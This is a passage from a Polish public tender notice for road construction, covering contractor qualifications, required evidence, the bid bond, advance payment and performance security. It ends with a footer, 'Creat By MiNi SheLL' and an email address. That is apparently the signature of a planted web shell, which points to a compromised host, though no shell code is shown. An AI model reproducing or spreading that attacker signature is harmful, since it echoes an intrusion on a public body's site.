500.000,00 zł brutto.<br/>2. Dysponowanie potencjałem technicznym - wyposażeniem technicznym przewidzianym do<br/>użycia przy realizacji zamówienia:<br/>2.1. Będą dysponować osobą/-ami – kierownikiem budowy/kierownikami – posiadającą/-ymi<br/>uprawnienia budowlane zgodne z przedmiotem zamówienia bez ograniczeń w pełnieniu<br/>obowiązków Kierownika Budowy, zgodnie z wymogiem ustawy Prawo budowlane z dnia 7 lipca<br/>1994 r. (tekst jednolity Dz. U. z 2020r., poz. 1333) w branży konstrukcyjno – budowlanej lub drogowej bez ograniczeń (wg wzoru w zał. nr 6 SWZ).<br/>Uwaga: Osoby kierujące robotami budowlanymi powinny posiadać uprawnienia budowlane bez<br/>ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z<br/>2020r., poz. 1333) oraz ustawy z dnia 9 maja 2014 r. o ułatwieniu dostępu do wykonywania<br/>niektórych zawodów regulowanych (Dz. U. z 2014r. poz. 768) lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w<br/>budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których<br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. Dz. U. z 2020r., poz. 220). Sprawdzanie ww. warunków udziału w postępowaniu<br/>odbywać się będzie na podstawie przedłożonych przez Wykonawcę oświadczeń wg zasady<br/>spełnia/nie spełnia.<br/>2.2. Wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, albo wniosków o<br/>dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie minimum 1 robotę budowlaną, odpowiadającą swoim rodzajem robotom<br/>budowlanym o wartości każdej roboty nie mniejszej niż 500.000,00 zł (brutto).<br/>Określenie „roboty budowlane odpowiadające swoim rodzajem robotom budowlanym<br/>stanowiącym przedmiot zamówienia” oznacza: wykonanie robót polegających na robotach<br/>związanych z budową, remontem lub przebudową dróg. Ocenę spełniania warunku udziału w<br/>postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia<br/>wykazu robót. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający będzie wymagał złożenia niżej wymienionych podmiotowych<br/>środków dowodowych:<br/>Wykazu robót budowlanych, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, spełniających wymagania określone w punkcie 18.1 SWZ wykonanych nie wcześniej niż w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów,<br/>na rzecz których roboty budowlane zostały wykonane, sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi wykonawcami, powyższy wykaz dotyczy tylko robót budowlanych, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>Wszystkie ww. podmiotowe środki dowodowe (wymienione w niniejszym punkcie nr 19 SWZ)<br/>wykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego wskazanym<br/>i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z 23.12.2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz zgodnie z Rozporządzeniem<br/>Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie” (Dz.U.<br/>z 2020 r. poz. 2452).<br/>Wykazy robót budowlanych będą musiały być sporządzone i podpisane przez ten podmiot, który<br/>spełnia dany warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum lub „podmiot<br/>trzeci”.<br/>Uwaga: wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia powyższych<br/>warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa w punkcie 10.1.4)<br/>SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z<br/>przesłanek, o których mowa w<br/>art. 108 ust. 1 Pzp: wykonawca, żaden ze wspólników konsorcjum (w przypadku składania oferty<br/>wspólnej) ani żaden podmiot, na którego zasoby powołuje się wykonawca w celu spełnienia warunków<br/>udziału w postępowaniu Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z<br/>przesłanek, o których mowa w art. 108 ust. 1 Pzp: wykonawca, żaden ze wspólników konsorcjum (w<br/>przypadku składania oferty wspólnej) ani żaden podmiot, na którego zasoby powołuje się wykonawca<br/>w celu spełnienia warunków udziału w postępowaniu jeżeli udowodni Zamawiającemu, że spełnił<br/>łącznie następujące przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub<br/>swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim<br/>nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując<br/>odpowiednio z właściwymi organami, w tym organami ścigania, lub zamawiającym;<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym<br/>przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe<br/>postępowanie Wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych<br/>regulacji lub standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie<br/>przepisów, wewnętrznych regulacji lub standardów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 4.4. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów<br/>równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji<br/>technicznej. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez<br/>Zamawiającego, jest obowiązany wykazać, ze oferowane przez niego dostawy materiałów do<br/>realizacji zadania spełniają wymagania określone przez Zamawiającego.<br/>Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji, a więc w dokumentach<br/>opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1<br/>pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to<br/>Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie,<br/>europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji<br/>technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej ocenie<br/>technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne&#34;. Zgodnie<br/>z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający będzie wymagał złożenia niżej wymienionych podmiotowych środków<br/>dowodowych:Wykazu robót budowlanych, zgodny ze wzorem zamieszczonym w załączniku nr 5<br/>do SWZ, spełniających wymagania określone w punkcie 18.1 SWZ wykonanych nie wcześniej<br/>niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których dostawy te zostały wykonane, sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty.Jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw,<br/>wykonywanych wspólnie z innymi wykonawcami, powyższy wykaz dotyczy tylko dostaw, w<br/>których wykonaniu wykonawca ten bezpośrednio uczestniczył. Wszystkie ww. podmiotowe<br/>środki dowodowe (wymienione w niniejszym punkcie nr 19 SWZ) wykonawcy będą musieli<br/>złożyć na każde żądanie Zamawiającego w terminie przez niego wskazanym i w formie<br/>określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z 23.12.2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz zgodnie z Rozporządzeniem<br/>Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie” (Dz.U. z 2020 r. poz. 2452). Wykazy robót budowlanych będą musiały być<br/>sporządzone i podpisane przez ten podmiot, który spełnia dany warunek, czyli odpowiednio<br/>przez: wykonawcę lub wspólnika konsorcjum lub „podmiot trzeci”.Uwaga: wykonawca, który<br/>polega na zdolnościach innych podmiotów w celu spełnienia powyższych warunków musi wraz z<br/>ofertą złożyć zobowiązanie tych podmiotów, o którym mowa w punkcie 10.1.4) SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które wykonawcy muszą złożyć wraz z ofertą:1) wypełniony FORMULARZ<br/>OFERTOWY, stanowiący załącznik nr 3 do SWZ. Do oferty należy dołączyć aktualne dokumenty<br/>potwierdzające status prawny wykonawcy, np. odpis z właściwego rejestru lub z centralnej<br/>ewidencji i informacji o działalności gospodarczej. Oferta nie musi zawierać tych dokumentów w<br/>przypadku wskazania przez wykonawcę, że są one dostępne w formie elektronicznej pod<br/>określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych.<br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z ww. dokumentów.<br/>Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z ww. dokumentów, to do oferty<br/>należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej<br/>notarialnie. 2) dowód wpłaty wadium;3) pełnomocnictwo ustanowione do reprezentowania<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;4) wykonawca,<br/>który w celu spełnienia warunków udziału w postępowaniu, o których mowa w punktach 18.1 lub<br/>18.2 lub 18.3 SWZ będzie polegał na zdolnościach podmiotów udostępniających zasoby to<br/>zgodnie z art. 118 ust. 3 Pzp musi złożyć wraz z ofertą zobowiązanie podmiotów<br/>udostępniających zasoby do oddania mu do dyspozycji te zasoby na potrzeby realizacji<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zgodnie z art. 118 ust.<br/>4 Pzp: Zobowiązanie podmiotu udostępniającego zasoby musi potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz musi określać w szczególności:a) zakres dostępnych wykonawcy zasobów<br/>podmiotu udostępniającego zasoby;b) sposób i okres udostępnienia wykonawcy i wykorzystania<br/>przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;c)<br/>czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą. 5) wypełniony załącznik nr 4 do SWZ, stanowiący oświadczenia<br/>odpowiednio: wykonawcy; każdego ze wspólników konsorcjum (w przypadku składania oferty<br/>wspólnej); podmiotów, na zasoby, których powołuje się wykonawca w celu spełnienia warunków<br/>udziału w postępowaniu dotyczące spełniania warunków udziału w postępowaniu, o których<br/>mowa w punktach 18.1, 18.2 i 18.3 SWZ oraz przesłanek wykluczenia z postępowania, o<br/>których mowa w art. 108 ust. 1 Pzp (punkt 12 SWZ) oraz art. 109 ust. 1 Pzp punkty 5, 6, 7, 8, 9 i<br/>10 (punkt 17 SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga złożenia wadium w wysokości 30.000,00 zł (słownie: trzydzieści tysięcy<br/>złotych).<br/>Zgodnie z art. 97 ust. 7 Pzp „Wadium może być wnoszone według wyboru wykonawcy w jednej<br/>lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>Zgodnie z art. 97 ust. 8 Pzp „Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek<br/>bankowy wskazany przez zamawiającego”. Nr rachunku, na który należy wpłacić wadium:<br/>BNP PARIBAS 71 2030 0045 1110 0000 0185 2400 z adnotacją: &#34;Wadium – nr sprawy:<br/>PZD.272.2.2022&#34;.<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed<br/>upływem terminu skłania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>Zgodnie z art. 97 ust. 10 Pzp jeżeli wadium będzie wnoszone w formie gwarancji lub poręczenia,<br/>o których mowa w ust. 7 pkt 2–4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej wraz z ofertą. Wadium musi zabezpieczać ofertę przez cały<br/>okres związania ofertą.<br/>Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z<br/>ustawy Pzp, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na<br/>pierwsze żądanie Zamawiającego, w przypadkach określonych w ustawie Pzp oraz być ważne<br/>przez okres związania ofertą, określony w niniejszej SWZ. Musi być wykonalne na terytorium<br/>Rzeczypospolitej Polskiej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót, wykonywanych wspólnie z<br/>innymi wykonawcami, powyższy wykaz dotyczy tylko robót, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>Wszystkie ww. podmiotowe środki dowodowe (wymienione w niniejszym punkcie nr 19 SWZ)<br/>wykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego<br/>wskazanym i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz<br/>zgodnie z Rozporządzeniem Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie” (Dz.U. z 2020 r. poz. 2452).<br/>Wykazy robót budowlanych będą musiały być sporządzone i podpisane przez ten podmiot, który<br/>spełnia dany warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum lub<br/>„podmiot trzeci”.<br/>Uwaga: wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia<br/>powyższych warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa<br/>w punkcie 10.1.4) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. W nawiązaniu do punktu 35 SWZ Zamawiający zgodnie z art. 442 ust. 1 Pzp. udzieli zaliczki<br/>na poczet wykonania zamówienia, w 5% wartości zamówienia).<br/>2. Zaliczka będzie wypłacona na poczet robót przygotowawczych (wytyczenie, roboty ziemne –<br/>rozbiórka, zabezpieczenie istniejącej infrastruktury podziemnej).<br/>3. Zaliczka przekazana Wykonawcy ma być wydatkowana na sfinansowanie robót<br/>przygotowawczych do realizacji zamówienia uszczegółowionych w harmonogramie prac.<br/>4. W związku z powyższym Zamawiający będzie żądał od wykonawcy wniesienia<br/>zabezpieczenia zaliczki w jednej lub kilku następujących formach:*<br/>1) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z<br/>tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>5) w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowokredytowej;<br/>6) przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa<br/>lub jednostkę samorządu terytorialnego;<br/>7) przez ustanowienie zastawu rejestrowego na zasadach określonych w ustawie z dnia 6<br/>grudnia 1996r. o zastawie rejestrowym i rejestrze zastawów (Dz. U. z 2018 r. poz. 2017).<br/>*niepotrzebne skreślić<br/>5. Rozliczenie zaliczki nastąpi po wykonaniu i odebraniu przez inspektora nadzoru robót<br/>przygotowawczych do realizacji zamówienia uszczegółowionych w harmonogramie prac bez<br/>uwag.<br/>6. W przypadku odstąpienia od umowy z winy Wykonawcy zgodnie z art. 494 § 1 k.c. będzie on<br/>obowiązany do zwrotu zaliczki jaką Zamawiający przekazał na poczet realizacji umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane w formie aneksu<br/>podpisanego przez obie strony, pod rygorem nieważności w przypadkach określonych w SWZ.<br/>Zamawiający zgodnie z art. 455 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych przewiduje<br/>możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie<br/>opisanym w § 15 projektu umowy stanowiącej załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzd-czestochowa.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający będzie żądać od Wykonawcy, którego oferta została wybrana jako<br/>najkorzystniejsza, wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 %<br/>ceny ofertowej (brutto).Formy zabezpieczenia.Zabezpieczenie należytego wykonania umowy<br/>może być wniesione w następujących formach:pieniądzu;poręczeniach bankowych lub<br/>poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest<br/>zawsze zobowiązaniem pieniężnym;gwarancjach bankowych;gwarancjach<br/>ubezpieczeniowych;poręczeniach udzielanych przez Polską Agencję Rozwoju<br/>Przedsiębiorczości.Sposób i miejsce składania zabezpieczenia.Zabezpieczenie należytego<br/>wykonania umowy wnoszone w formie pieniężnej powinno zostać wpłacone przelewem na<br/>wskazany w pkt. 1 SWZ, rachunek bankowy.W trakcie realizacji umowy Wykonawca może<br/>dokonać zmiany formy zabezpieczenia na jedną lub kilka form zabezpieczenia, o których mowa<br/>w pkt. niniejszej SWZ.Termin składania zabezpieczenia. Wykonawca, którego oferta zostanie<br/>wybrana winien wnieść zabezpieczenie należytego wykonania umowy najpóźniej w dniu<br/>podpisania umowy. Zabezpieczenie składane w formie innej niż pieniężna winno zabezpieczać<br/>umowę min. do dnia planowanego terminu realizacji zamówienia oraz uwzględniać 30 dniowy<br/>termin zwrotu zabezpieczenia, o którym mowa w art. 453 ust.1 ustawy. Zwrot<br/>zabezpieczenia.Zamawiający dokona zwrotu zabezpieczenia należytego wykonania umowy w<br/>następujący sposób:Zwrot zabezpieczenia w wysokości odpowiadającej 70 % wniesionego<br/>zabezpieczenia nastąpi w terminie 30 dni od dnia wykonania i uznania za należyte wykonania<br/>przedmiotu umowy. Pozostałe 30 % zostanie zwrócone nie później niż w 15 dniu po upływie<br/>okresu rękojmi za wady lub gwarancji, o którym mowa w art. 453 ust.3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com